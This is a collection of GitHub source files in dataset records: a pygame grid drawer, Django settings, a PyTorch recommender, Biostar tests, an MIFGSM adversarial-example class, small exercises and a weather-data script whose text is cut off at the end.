__name__==\"__main__\": \n main() \n \n","repo_name":"Suhail727/GeneralProgramming","sub_path":"Reverse a String.py","file_name":"Reverse a String.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"35710315828","text":"#!/usr/bin/env python3\n\n# A quick and dirty way to draw a pixel grid out\n\nimport pygame\n \ndef main():\n width, height = 40, 6\n pix_size = 15\n off_x, off_y = 1, 1\n screen_size = (\n (width + 2) * pix_size,\n (height + 2 + 2) * pix_size,\n )\n bits = set()\n\n def dump_bits():\n print(\"-\" * 100)\n row = \"\"\n for x, y in sorted(bits):\n row += f\"({x},{y}),\"\n if len(row) >= 100:\n print(row)\n row = \"\"\n print(row)\n\n pygame.font.init()\n font = pygame.font.SysFont('Segoe UI', 10)\n buttons = [\n (1, height + 2, font.render(\"Dump grid\", False, (255, 255, 255)), dump_bits),\n ]\n\n pygame.init()\n pygame.display.set_caption(\"Bits and Bits\")\n\n screen = pygame.display.set_mode(screen_size)\n running = True\n\n set_to = None\n def toggle(x, y, force=None):\n if x >= pix_size and y >= pix_size and x < pix_size * (width + 1) and y < pix_size * (height + 1):\n x = (x // pix_size) - 1\n y = (y // pix_size) - 1\n if force is None:\n if (x, y) in bits:\n bits.remove((x, y))\n return False\n else:\n bits.add((x, y))\n return True\n else:\n if force:\n if (x, y) not in bits:\n bits.add((x, y))\n else:\n if (x, y) in bits:\n bits.remove((x, y))\n return force\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n running = False\n elif event.type == pygame.MOUSEBUTTONDOWN:\n set_to = toggle(event.pos[0], event.pos[1])\n if set_to is None:\n for x, y, _, func in buttons:\n if x * pix_size <= event.pos[0] <= (x + 10) * pix_size:\n if y * pix_size <= event.pos[1] <= (y + 1) * pix_size:\n func()\n elif event.type == pygame.MOUSEBUTTONUP:\n set_to = None\n elif event.type == pygame.MOUSEMOTION:\n if set_to is not None:\n toggle(event.pos[0], event.pos[1], set_to)\n\n pygame.draw.rect(screen, (0, 0, 0), (0, 0, screen_size[0], screen_size[1]))\n for x in range(width + 1):\n pygame.draw.line(screen, (128, 128, 128), ((x + off_x) * pix_size, off_y * pix_size), ((x + off_x) * pix_size, (height + off_y) * pix_size))\n for y in range(height + 1):\n pygame.draw.line(screen, (128, 128, 128), (off_x * pix_size, (y + off_y) * pix_size), ((width + off_x) * pix_size, (y + off_y) * pix_size))\n\n for x, y, text, _ in buttons:\n pygame.draw.rect(screen, (255, 255, 255), (x * pix_size, y * pix_size, (10) * pix_size, (1) * pix_size))\n pygame.draw.rect(screen, (92, 92, 92), (x * pix_size+1, y * pix_size+1, (10) * pix_size-2, (1) * pix_size-2))\n screen.blit(text, (x * pix_size+1, y * pix_size+1))\n\n for x, y in bits:\n pygame.draw.rect(screen, (255, 255, 255), ((x + off_x) * pix_size, (y + off_y) * pix_size, pix_size, pix_size))\n\n pygame.display.flip()\n\nif __name__==\"__main__\":\n main()\n","repo_name":"seligman/aoc","sub_path":"2023/Helpers/grid_draw.py","file_name":"grid_draw.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"42"} +{"seq_id":"5237342247","text":"import os\nimport environ\nfrom split_settings.tools import optional, include\nfrom coldfront.config.env import ENV, PROJECT_ROOT\n\n# ColdFront split settings\ncoldfront_configs = [\n 'base.py',\n 'database.py',\n 'auth.py',\n 'logging.py',\n 'core.py',\n 'plugins/cas_login.py',\n]\n\nif ENV.bool('EMAIL_ENABLED', default=False):\n coldfront_configs.append('email.py')\n\n# ColdFront plugin settings\nplugin_configs = {\n 'PLUGIN_SLURM': 'plugins/slurm.py',\n 'PLUGIN_IQUOTA': 'plugins/iquota.py',\n 'PLUGIN_FREEIPA': 'plugins/freeipa.py',\n 'PLUGIN_SYSMON': 'plugins/system_montior.py',\n 'PLUGIN_XDMOD': 'plugins/xdmod.py',\n 'PLUGIN_AUTH_OIDC': 'plugins/openid.py',\n 'PLUGIN_AUTH_LDAP': 'plugins/ldap.py',\n 'PLUGIN_LDAP_USER_SEARCH': 'plugins/ldap_user_search.py',\n 'PLUGIN_LDAP_USER_INFO': 'plugins/ldap_user_info.py',\n 'PLUGIN_CAS': 'plugins/cas_login.py',\n 'PLUGIN_ACADEMIC_ANALYTICS': 'plugins/academic_analytics.py',\n 'PLUGIN_ADVANCED_SEARCH': 'plugins/advanced_search.py',\n 'PLUGIN_MAINTENANCE_MODE': 'plugins/maintenance_mode.py',\n 'PLUGIN_SLATE_PROJECT':'plugins/slate_project.py',\n}\n\n# This allows plugins to be enabled via environment variables. Can alternatively\n# add the relevant configs to local_settings.py\nfor key, pc in plugin_configs.items():\n if ENV.bool(key, default=False):\n coldfront_configs.append(pc)\n\n# Local settings overrides\nlocal_configs = [\n # Local settings relative to coldfront.config package\n 'local_settings.py',\n\n # System wide settings for production deployments\n '/etc/coldfront/local_settings.py',\n\n # Local settings relative to coldfront project root\n PROJECT_ROOT('local_settings.py')\n]\n\nif ENV.str('COLDFRONT_CONFIG', default='') != '':\n # Local settings from path specified via environment variable\n local_configs.append(environ.Path(ENV.str('COLDFRONT_CONFIG'))())\n\nfor lc in local_configs:\n coldfront_configs.append(optional(lc))\n\ninclude(*coldfront_configs)\n","repo_name":"IUResearchApplications/coldfront","sub_path":"coldfront/config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"8817355650","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\nimport pandas as pd\r\nimport itertools\r\n\r\n\r\n\r\ndef proc_col(col, train_col=None):\r\n \"\"\"\r\n Encodes a pandas column with continuous IDs.\r\n\r\n \"\"\"\r\n if train_col is not None:\r\n uniq = train_col.unique()\r\n else:\r\n uniq = col.unique()\r\n \r\n # Create a dictionary that maps category names to numerical IDs\r\n name2idx = {o: i for i, o in enumerate(uniq)}\r\n \r\n # Replace each value in the column with its corresponding numerical ID,\r\n # using -1 if the value is not found in 'train_col'\r\n encoded_col = np.array([name2idx.get(x, -1) for x in col])\r\n \r\n # Calculate the number of unique categories in the column\r\n num_uniq = len(uniq)\r\n \r\n return name2idx, encoded_col, num_uniq\r\n\r\n\r\n\r\ndef encode_data(df, train=None):\r\n \"\"\"\r\n Encodes rating data with continuous user and item IDs.\r\n\r\n \"\"\"\r\n df = df.copy()\r\n for col_name in [\"userId\", \"itemId\"]:\r\n train_col = None\r\n if train is not None:\r\n train_col = train[col_name]\r\n _, col, _ = proc_col(df[col_name], train_col)\r\n \r\n # Remove rows with negative IDs (IDs not found in 'train' data)\r\n df = df[df[col_name] >= 0]\r\n \r\n # Update the DataFrame with the encoded column\r\n df[col_name] = col\r\n \r\n return df\r\n\r\n\r\ndef train_epocs(model, df_train, epochs=10, lr=0.01, wd=0.0, unsqueeze=False):\r\n \"\"\"\r\n Training loop for a recommendation model.\r\n\r\n This function trains the recommendation model for the specified number of epochs.\r\n It uses Mean Squared Error (MSE) loss and an Adam optimizer for training.\r\n \"\"\"\r\n optimizer = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=wd)\r\n model.train()\r\n \r\n for i in range(epochs):\r\n # Load user IDs, item IDs, and ratings from the training data\r\n users = torch.LongTensor(df_train.userId.values - 1)\r\n items = torch.LongTensor(df_train.itemId.values - 1)\r\n ratings = torch.FloatTensor(df_train.rating.values)\r\n \r\n # Optionally, unsqueeze the ratings tensor to match the model output shape\r\n if unsqueeze:\r\n ratings = ratings.unsqueeze(1)\r\n \r\n # Forward pass: compute predicted ratings\r\n y_hat = model(users, items)\r\n \r\n # Calculate Mean Squared Error (MSE) loss between predictions and actual ratings\r\n loss = F.mse_loss(y_hat, ratings)\r\n \r\n # Backpropagation: compute gradients and update model weights\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n \r\n # Print the loss for the current epoch\r\n print(f\"Epoch {i+1}/{epochs}, Loss: {loss.item()}\")\r\n\r\n\r\n\r\n\r\n\r\nclass CollabFNet(nn.Module):\r\n def __init__(self, num_users, num_items, emb_size=2, n_hidden=3): # emb_size and n_hidden should be hyperparameters\r\n \"\"\"\r\n Collaborative Filtering Neural Network (CollabFNet) model for recommendation.\r\n\r\n Initializes the CollabFNet model with user and item embedding layers and neural network layers.\r\n \"\"\"\r\n super(CollabFNet, self).__init__()\r\n \r\n self.user_emb = nn.Embedding(num_users, emb_size)\r\n \r\n self.item_emb = nn.Embedding(num_items, emb_size)\r\n \r\n self.lin1 = nn.Linear(emb_size * 2, n_hidden)\r\n \r\n self.lin2 = nn.Linear(n_hidden, 1)\r\n \r\n self.drop1 = nn.Dropout(0.1)\r\n \r\n def forward(self, u, v):\r\n \"\"\"\r\n Forward pass of the CollabFNet model.\r\n\r\n Parameters:\r\n - u: torch.Tensor\r\n Tensor containing user IDs.\r\n - v: torch.Tensor\r\n Tensor containing item IDs.\r\n\r\n Returns:\r\n - torch.Tensor\r\n Predicted ratings or scores for user-item interactions.\r\n \"\"\"\r\n # Lookup user embeddings for the given user IDs\r\n U = self.user_emb(u)\r\n \r\n # Lookup item embeddings for the given item IDs\r\n V = self.item_emb(v)\r\n \r\n # Concatenate user and item embeddings\r\n x = F.relu(torch.cat([U, V], dim=1))\r\n \r\n # Apply dropout for regularization\r\n x = self.drop1(x)\r\n \r\n # Apply ReLU activation to the first linear layer\r\n x = F.relu(self.lin1(x))\r\n \r\n # Apply the second linear layer for final predictions\r\n x = self.lin2(x)\r\n \r\n return x\r\n\r\n\r\n\r\ndef create_candidate_set(ratings_df, num_users, num_items, item_name_mapping):\r\n\r\n # Create a set of all possible user-item pairs\r\n all_user_ids = range(1, num_users + 1) # 1- 100 # since ratings_df will consist of 1-100\r\n all_item_ids = range(1, num_items + 1)\r\n all_user_item_pairs = list(itertools.product(all_user_ids, all_item_ids))\r\n\r\n # Convert the rated user-item pairs to a set for faster lookup\r\n rated_user_item_pairs = set(zip(ratings_df['userId'], ratings_df['itemId']))\r\n\r\n # Identify unused user-item pairs as the complement of rated pairs\r\n unused_user_item_pairs = list(set(all_user_item_pairs) - rated_user_item_pairs)\r\n\r\n # Create a DataFrame for the candidate set\r\n candidate_set = pd.DataFrame(unused_user_item_pairs, columns=['userId', 'itemId'])\r\n candidate_set['item'] = candidate_set['itemId'].map(item_name_mapping)\r\n \r\n return candidate_set # candidate set will have 1-100 and 1-10 combinations\r\n\r\n\r\n\r\n\r\n# Function to predict ratings for the candidate set using the trained model\r\ndef predict_ratings_for_candidate_set(model, candidate_set, item_name_mapping):\r\n \"\"\"\r\n Predict ratings for user-item pairs in the candidate set.\r\n \"\"\"\r\n # Convert user and item IDs to PyTorch tensors\r\n user_ids = torch.LongTensor(candidate_set['userId'].values - 1) # for prediction, we subtract 1 \r\n item_ids = torch.LongTensor(candidate_set['itemId'].values - 1)\r\n \r\n # Use the model to predict ratings\r\n predicted_ratings = model(user_ids, item_ids)\r\n \r\n results_df = pd.DataFrame({\r\n 'userId': candidate_set['userId'], # but for df we can have 1-100\r\n 'itemId': candidate_set['itemId'], \r\n 'item': candidate_set['item'] ,\r\n 'predicted_ratings': predicted_ratings.squeeze().tolist()\r\n })\r\n \r\n return results_df\r\n\r\n\r\n# Function to recommend items for a specific user\r\ndef recommend_items_for_user(model, user_id, results_df, top_n=3):\r\n \"\"\"\r\n Recommend items for a specific user based on predicted ratings.\r\n\r\n \"\"\"\r\n # Filter candidate set for the specific user\r\n user_candidate_set = results_df[results_df['userId'] == user_id]\r\n \r\n # Sort the user's candidate set by predicted rating in descending order\r\n sorted_candidate_set = user_candidate_set.sort_values(by='predicted_ratings', ascending=False)\r\n \r\n # Select the top-N recommendations\r\n recommendations = sorted_candidate_set.head(top_n)\r\n \r\n return recommendations\r\n\r\n\r\n\r\n\r\n","repo_name":"himanshukumargupta11012/Milan_hackathon","sub_path":"backend/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":7020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"70385231167","text":"import mitsuba as mi\nimport drjit as dr\nimport matplotlib.pyplot as plt\n\nmi.set_variant(\"cuda_ad_rgb\")\nscene = mi.load_file(\"../scenes/shader_ball/scene.xml\", spp=512)\nparams = mi.traverse(scene)\n\nimg = mi.render(scene)\nimg = mi.util.convert_to_bitmap(img)\n\nplt.axis(\"off\")\nplt.imshow(img)\nplt.savefig(\"rough_dielectric_2.png\")","repo_name":"gmf128/mitsuba-quickstart","sub_path":"bsdfs/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"39926691890","text":"class Solution:\n def lengthOfLIS(self, nums: List[int]) -> int:\n #go through finding sequences and store in dictionary\n #if you start with a certain number you have to end in a certain sqeuence\n #because you go in order\n #store in dict and return\n #implmeent find seq first then dictionary \n \n res = 0\n \n tot = [1] * len(nums) # I had most of it down except this part, where this allows\n #you to iterate over the array without taking into account the ones that you\n #want to remove \n \n for i in range(1, len(nums)):\n for j in range(0, i):\n if nums[i] > nums[j]:\n tot[i] = max(tot[i], tot[j] + 1)\n \n return max(tot)\n\n\n\n'''\noptimal nlogn approach i found \n\nclass Solution:\n def lengthOfLIS(self, arr: List[int]) -> int:\n subs = [arr[0]]\n for i in range(1,len(arr)):\n if arr[i] > subs[-1]: subs.append(arr[i])\n else:\n subs[bisect_left(subs, arr[i], 0, len(subs))] = arr[i]\n return len(subs)\n\n'''","repo_name":"saesak/codinginterview","sub_path":"leetcode/Top 50 Interview Questions (Medium)/Dynamic Programming/300. Longest Increasing Subsequence (Medium).py","file_name":"300. Longest Increasing Subsequence (Medium).py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"24886533324","text":"import logging\nimport os\nfrom unittest.mock import patch, MagicMock\n\nfrom django.conf import settings\nfrom django.test import TestCase, RequestFactory, override_settings\nfrom django.urls import reverse\nfrom django.test import TestCase, override_settings\n#from biostar.accounts.models import Use\n\nfrom biostar.recipes import auth, const\nfrom biostar.recipes import models, views, api\nfrom biostar.utils.helpers import fake_request, get_uuid\n\nlogger = logging.getLogger('engine')\n\nTEST_ROOT = os.path.abspath(os.path.join(settings.BASE_DIR, 'export', 'tested'))\nTOC_ROOT = os.path.join(TEST_ROOT, 'toc')\n__CURRENT_DIR = os.path.abspath(os.path.dirname(__file__))\n\n# Ensure that the table of directory exists.\nos.makedirs(TOC_ROOT, exist_ok=True)\n\n@override_settings(MEDIA_ROOT=TEST_ROOT, TOC_ROOT=TOC_ROOT)\nclass RecipeRunTest(TestCase):\n\n def setUp(self):\n logger.setLevel(logging.WARNING)\n\n # Set up generic owner\n self.owner = models.User.objects.create_user(username=f\"tested{get_uuid(10)}\", email=\"tested@l.com\",\n is_staff=True, is_superuser=True)\n self.owner.set_password(\"tested\")\n self.factory = RequestFactory()\n\n self.project = auth.create_project(user=self.owner, name=\"tested\", text=\"Text\", summary=\"summary\",\n uid=\"tested\")\n # Test data\n self.recipe = auth.create_analysis(project=self.project, json_text=\"\", template=\"#test template\")\n self.recipe.save()\n\n def test_authorize_run(self):\n \"\"\"Test to see if function that authorizes runs works correctly.\"\"\"\n\n user1 = self.owner\n recipe = self.recipe\n\n # Current user can run the recipe\n\n self.assertTrue(auth.authorize_run(user1, recipe), \"Authorized users can not run recipes.\")\n\n user2 = models.User.objects.create_user(username=f\"tested{get_uuid(10)}\", email=\"tested@l.com\")\n\n self.assertFalse(auth.authorize_run(user2, recipe), \"Unauthorized users can run recipes.\")\n return\n\n\n@override_settings(MEDIA_ROOT=TEST_ROOT)\nclass RecipeViewTest(TestCase):\n\n def setUp(self):\n logger.setLevel(logging.WARNING)\n\n # Set up generic owner\n self.owner = models.User.objects.create_user(username=f\"tested{get_uuid(10)}\", email=\"tested@l.com\",\n is_staff=True, is_superuser=True)\n self.owner.set_password(\"tested\")\n self.factory = RequestFactory()\n\n self.project = auth.create_project(user=self.owner, name=\"tested\", text=\"Text\", summary=\"summary\",\n uid=\"tested\")\n # Test data\n self.recipe = auth.create_analysis(project=self.project, json_text=\"\", template=\"#test template\")\n self.recipe.save()\n\n @patch('biostar.recipes.models.Job.save', MagicMock(name=\"save\"))\n def test_recipe_run(self):\n \"Test the recipe run view with POST request\"\n\n data = {\"name\": \"name of the job\"}\n\n url = reverse('recipe_run', kwargs=dict(uid=self.recipe.uid))\n\n request = fake_request(url=url, data=data, user=self.owner)\n\n self.recipe.security = models.Analysis.AUTHORIZED\n self.recipe.save()\n\n response = views.recipe_run(request=request, uid=self.recipe.uid)\n\n self.process_response(response=response, data=data, save=True, model=models.Job)\n\n @patch('biostar.recipes.models.Analysis.save', MagicMock(name=\"save\"))\n def test_recipe_create(self):\n \"Test recipe create with POST request\"\n data = {\"name\": \"tested\", \"summary\": \"summary\", \"text\": \"text\", \"rank\": 100,\n \"uid\": \"tested\", 'json_text':'', 'template':'# Code here'}\n url = reverse('recipe_create', kwargs=dict(uid=self.project.uid))\n\n request = fake_request(url=url, data=data, user=self.owner)\n\n response = views.recipe_create(request=request, uid=self.project.uid)\n\n self.process_response(response=response, data=data, save=True)\n\n @patch('biostar.recipes.models.Analysis.save', MagicMock(name=\"save\"))\n def test_recipe_edit(self):\n \"Test recipe edit with POST request\"\n from biostar.recipes import ajax\n\n data = {\"name\": \"tested\", \"text\": \"text\", \"rank\": 100,\n \"uid\": \"tested\", 'json_text':'', 'template':'# Code here'}\n url = reverse('ajax_recipe_edit', kwargs=dict(id=f\"{self.recipe.id}\"))\n\n request = fake_request(url=url, data=data, user=self.owner)\n\n response = ajax.ajax_edit(request=request, id=self.recipe.id)\n\n #self.process_response(response=response, data=data, save=True)\n\n def test_recipe_code_download(self):\n \"Test recipe code download \"\n\n url = self.recipe.download_url()\n request = fake_request(url=url, data={}, user=self.owner)\n response = views.recipe_code_download(request=request, uid=self.recipe.uid, fname=\"recipe.sh\")\n\n self.assertTrue(response.content.decode() == self.recipe.template,\n f\"Error downloading code. Expected: {self.recipe.template} \"\n f\"received: {response.content.decode()}\")\n\n def test_recipe_delete(self):\n \"Test reset delete\"\n\n url = reverse('recipe_delete', kwargs=dict(uid=self.recipe.uid))\n\n request = fake_request(url=url, data={}, user=self.owner)\n\n response = views.recipe_delete(request=request, uid=self.recipe.uid)\n\n self.process_response(response=response, data={})\n\n def Xtest_api(self):\n \"Test the recipe api\"\n\n api_list = reverse('api_list'), api.recipe_api_list, {}\n api_json = reverse('recipe_api_json', kwargs=dict(uid=self.recipe.uid)), api.recipe_json, dict(\n uid=self.recipe.uid)\n api_template = reverse('recipe_api_template', kwargs=dict(uid=self.recipe.uid)), api.recipe_template, dict(\n uid=self.recipe.uid)\n\n for data in [api_list, api_json, api_template]:\n url, view_func, params = data\n\n request = fake_request(url=url, data={'k': settings.API_KEY}, user=self.owner)\n\n response = view_func(request=request, **params)\n\n self.assertEqual(response.status_code, 200, f\"Could not redirect :\\nresponse:{response}\")\n\n def test_recipe_update(self):\n \"Test updating recipe through auth\"\n\n changed = auth.create_analysis(project=self.project,\n json_text=self.recipe.json_text,\n template=self.recipe.template,\n uid=self.recipe.uid, update=True)\n\n self.assertEqual(changed.uid, self.recipe.uid)\n\n def process_response(self, response, data, model=models.Analysis, save=False):\n \"Check the response on POST request is redirected\"\n\n self.assertEqual(response.status_code, 302,\n f\"Could not redirect :\\nresponse:{response}\")\n\n if save:\n self.assertTrue(model.save.called, \"save() method not called when editing.\")\n","repo_name":"ialbert/biostar-central","sub_path":"biostar/recipes/test/test_recipe.py","file_name":"test_recipe.py","file_ext":"py","file_size_in_byte":7101,"program_lang":"python","lang":"en","doc_type":"code","stars":561,"dataset":"github-code","pt":"42"} +{"seq_id":"34984795936","text":"# 5.\tWrite a Python Program to Find Armstrong Number in an Interval?\nstart = int(input(\"Enter the start of the interval: \"))\nend = int(input(\"Enter the end of the interval: \"))\n\nfor num in range(start, end + 1):\n # Compute the sum of the cubes of the digits\n sum = 0\n temp = num\n while temp > 0:\n digit = temp % 10\n sum += digit ** 3\n temp //= 10\n\n # Check if the number is an Armstrong number\n if num == sum:\n print(num)\n","repo_name":"07Sada/Assingment","sub_path":"Python_Basic_Programming_Assignment/Programming_Assingment_4/p5.py","file_name":"p5.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"40828517045","text":"from attacks.attack import *\n\n\nclass MIFGSM(Attack):\n def __init__(self, model, mean, std, eps=8 / 255, steps=5, decay=1.0):\n super(MIFGSM, self).__init__(\"MIFGSM\", model, mean, std)\n self.eps = eps\n self.steps = steps\n self.decay = decay\n self.alpha = self.eps / self.steps\n\n def attack(self, images, labels):\n r\"\"\"\n Overridden.\n \"\"\"\n images = images.clone().detach().cuda()\n labels = labels.clone().detach().cuda()\n images = self._reverse_norm(images)\n\n loss = nn.CrossEntropyLoss()\n momentum = torch.zeros_like(images).detach().cuda()\n\n adv_images = images.clone().detach()\n\n for i in range(self.steps):\n adv_images.requires_grad = True\n outputs = self.model(adv_images)\n\n cost = - loss(outputs, labels)\n\n grad = torch.autograd.grad(cost, adv_images,\n retain_graph=False, create_graph=False)[0]\n\n grad_norm = torch.norm(nn.Flatten()(grad), p=1, dim=1)\n grad = grad / grad_norm.view([-1] + [1] * (len(grad.shape) - 1))\n grad = grad + momentum * self.decay\n momentum = grad\n\n adv_images = adv_images.detach() - self.alpha * grad.sign()\n delta = torch.clamp(adv_images - images, min=-self.eps, max=self.eps)\n adv_images = torch.clamp(images + delta, min=0, max=1).detach()\n\n adv_images = self._norm(adv_images)\n return adv_images\n","repo_name":"OrangeBai/pytorch-detection","sub_path":"attack/mifgsm.py","file_name":"mifgsm.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"7572203070","text":"__all__ = [\"matrix_to_file\", \"parse_file\"]\n\nimport re\n\nimport numpy as np\n\n\ndef matrix_to_file(distance_matrix, file):\n \"\"\"\n :param distance_matrix: a matrix with nodes as indexes and distances as values\n :param file: either a filename or an open file\n \"\"\"\n opened = False # keep track of whether we opened the file (the function input was a filename) or not\n\n try:\n if type(file) == str:\n file = open(file, 'w')\n opened = True\n\n file.seek(0)\n\n n = len(distance_matrix)\n file.write(\"VERTICES = {}\\n;\\n\\n\".format(n))\n\n file.write(\"DISTANCE_MATRIX = \\n\")\n for i in range(0, n):\n for j in range(0, n):\n file.write(\"{}\\t{}\\t{}\\n\".format(i, j, distance_matrix[i][j]))\n\n file.write(\";\")\n\n except OSError as err:\n print(\"Error in writing file: {0}\".format(err))\n finally:\n if opened:\n file.close()\n\n\ndef has_numbers(input_string):\n return any(char.isdigit() for char in input_string)\n\n\ndef parse_file(filename):\n num_vertices = None\n matrix = None\n with open(filename, 'r') as fp:\n first_line = fp.readline()\n num_vertices = re.findall(r'\\d+', first_line)\n assert len(num_vertices) == 1, 'Error in parsing file {}. First line should be VERTICES = ##\\n'.format(filename)\n num_vertices = int(num_vertices[0])\n\n line = fp.readline()\n while (\"DISTANCE_MATRIX\" not in line):\n line = fp.readline()\n\n \"\"\" from next line all lines are\n # # #\n -> three numbers, which are 'i, j, distance between i and j'\n \"\"\"\n matrix = np.zeros((num_vertices, num_vertices))\n line = fp.readline()\n while has_numbers(line):\n # read_i, read_j, read_distance\n ri, rj, rd = re.findall(r'^(\\d+)\\s*(\\d+)\\s*(\\d+(?:\\.\\d+)?)', line)[0]\n\n matrix[int(ri), int(rj)] = float(rd)\n line = fp.readline()\n\n return num_vertices, matrix\n","repo_name":"mirkosalaris/CoverageModularEnvironments","sub_path":"src/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"41650134541","text":" #!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Gray Martin, July 2020 updates by John McGuire\n\"\"\"\n\n#%% Imports\nimport logging\nimport utilities\nimport equations\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport geopandas as gpd\nfrom netCDF4 import Dataset\n\n#%% Setup\n#%%% Logging\nlog = logging.getLogger(__name__)\nlog_format = \"%(levelname)-7.7s - %(message)-60s\\t - [%(lineno)d] %(module)s.%(funcName)s\"\nlogging.basicConfig(level=logging.INFO, format=log_format)\n\n#%%% Development\n#TESTMODE = True\nTESTMODE = False\nDEBUGMODE = False\nnp.warnings.filterwarnings('ignore')\n\n#%%% Constants\nZ = 6\nstatelist = [\"North Carolina\", \"Virginia\"]\n\n# Get the file list\nvdatenow = datetime.datetime.utcnow()\nvdatetime = datetime.datetime(vdatenow.year, vdatenow.month, vdatenow.day, Z)\n\nif(vdatetime <= vdatenow):\n vdate = vdatetime\nelse:\n vdatetime = vdatetime - datetime.timedelta(days=1)\n vdate = vdatetime\n #vdate = vdate - datetime.timedelta(days=1)\nvdate_ymd = vdate.strftime(\"%Y%m%d\")\nvdate_ymdh = vdate.strftime(\"%Y%m%d%H\")\n\n# Generate the files\nlog.info(\"Generate files for\"+vdate_ymdh)#files = utilities.build_input_data(vdate, Z)\nfiles = utilities.build_input_data(vdate, Z)\nlog.info(\"Done generate files\")#files = utilities.build_input_data(vdate, Z)\n\n# File input\nnx,ny,nt = utilities.import_dims(\"input/rtma.nc\")\nvtime_rtma,times_rtma = utilities.import_times(\"input/rtma.nc\")\nvtime_ndfd,times_ndfd = utilities.import_times(\"input/ndfd.nc\")\nvtime_nbm,times_nbm = utilities.import_times(\"input/nbm.nc\")\n\nlat_array,lon_array = utilities.import_latlon(\"input/rtma.nc\")\n\n# The Mixture Configuration is as follows:\n#\n# \"We use the data [NDFD] until it reaches the 6-hourly mark, \n# then transition to NBM data to keep data at hourly then 3-hourly intervals.\"\"\n#\n# According to this input data, it appears that it should be mixed as following\n# 1-46, NDFD\n# 47-64, NBM\nvtime_mix=vtime_ndfd\ntimes_mix=np.concatenate([times_ndfd[:46],times_nbm[46:]],axis=0)\n\nRTMA_dates,RTMA_dates_int,RTMA_hours,mix_dates,mix_dates_int,mix_hours = utilities.file_timing(Z)\n#print(RTMA_dates)\n#print(mix_dates)\n\nsource_rtma = [\"rtma\" for i in range(0,len(times_rtma))]\nsource_ndfd = [\"ndfd\" for i in range(0,len(times_ndfd))]\nsource_nbm = [\"nbm\" for i in range(0,len(times_nbm))]\nsource_mix = np.hstack([source_ndfd[:46],source_nbm[46:]]) \n\n# The final times should in theory be\n# 1-25: RTMA\n# 26-71: NDFD\n# 72-89: NBM\n#times = np.hstack((times_rtma, times_nbm))\n#times_source = np.hstack((source_rtma, source_nbm))\ntimes = np.hstack((times_rtma, times_mix))\ntimes_source = np.hstack((source_rtma, source_mix))\n#print(times)\n#print(times_source)\n\n#%%% Longitude and Latitude \n#log.info(\"Longitude and Latitude\")\n#with open(\"resources/lonlat.csv\") as read_file:\n# lonlat = pd.read_csv(read_file)\n##print(nx,ny,nt)\n##quit()\n#\n## Set up arrays for both longitude and latitude\n#lon = lonlat.lon.to_numpy()\n#lon_array = lon.reshape(1,ny,nx)\n#\n#lat = lonlat.lat.to_numpy()\n#lat_array = lat.reshape(1,ny,nx)\n\n# Create \"stacked\" arrays spanning across time scales\nlon_RTMA = np.repeat(lon_array, len(times_rtma), axis=0)\nlat_RTMA = np.repeat(lat_array, len(times_rtma), axis=0)\n\nlon_NDFD = np.repeat(lon_array, len(times_ndfd), axis=0)\nlat_NDFD = np.repeat(lat_array, len(times_ndfd), axis=0)\n\nlon_mix = np.repeat(lon_array, len(times_mix), axis=0)\nlat_mix = np.repeat(lat_array, len(times_mix), axis=0)\n\n## Create GeoPandas DataFrame containing latitude and longitude\n#gdf = gpd.GeoDataFrame(lonlat, \n# geometry=gpd.points_from_xy(lonlat.lon-360, lonlat.lat))\n#\n##%%% Region Masking\n#log.info(\"Region Masking\")\n#statemasks, statelabels, states = utilities.to_state(gdf, statelist=statelist)\n#\n#dimmasks = [None]*len(statemasks)\n#combined_mask = np.full((1,ny,nx), False)\n#for row in range(0, len(statemasks)):\n# statemask = statemasks[row]\n# mask = statemask.to_numpy()\n# dimmasks[row] = mask.reshape(1,ny,nx)\n# combined_mask = np.logical_or(combined_mask, dimmasks[row])\n#\n## Keeping mask because elevation data does not encompass entire model domain\nlog.info(\"DO NOT Mask Application\")\ncombined_mask = np.full((1,ny,nx), True)\n\n#%%% Mask Application\nlog.info(\"Mask Application\")\n# Apply masks to longitude and latitude arrays\nlon_array_masked = np.where(combined_mask, lon_array, np.nan)\nlat_array_masked = np.where(combined_mask, lat_array, np.nan)\n\n# Create \"stacked\" arrays spanning across time scales\nlon_mask_RTMA = np.repeat(lon_array_masked, len(times_rtma), axis=0)\nlat_mask_RTMA = np.repeat(lat_array_masked, len(times_rtma), axis=0)\n\nlon_mask_NDFD = np.repeat(lon_array_masked, len(times_ndfd), axis=0)\nlat_mask_NDFD = np.repeat(lat_array_masked, len(times_ndfd), axis=0)\n\nlon_mask_mix = np.repeat(lon_array_masked, len(times_mix), axis=0)\nlat_mask_mix = np.repeat(lat_array_masked, len(times_mix), axis=0)\n \n#%% Solar Calculations\n#%%% Time\nlog.info(\"Timing\")\njday_RTMA, hour_RTMA, jday_NDFD, hour_NDFD, jday_mix, hour_mix = 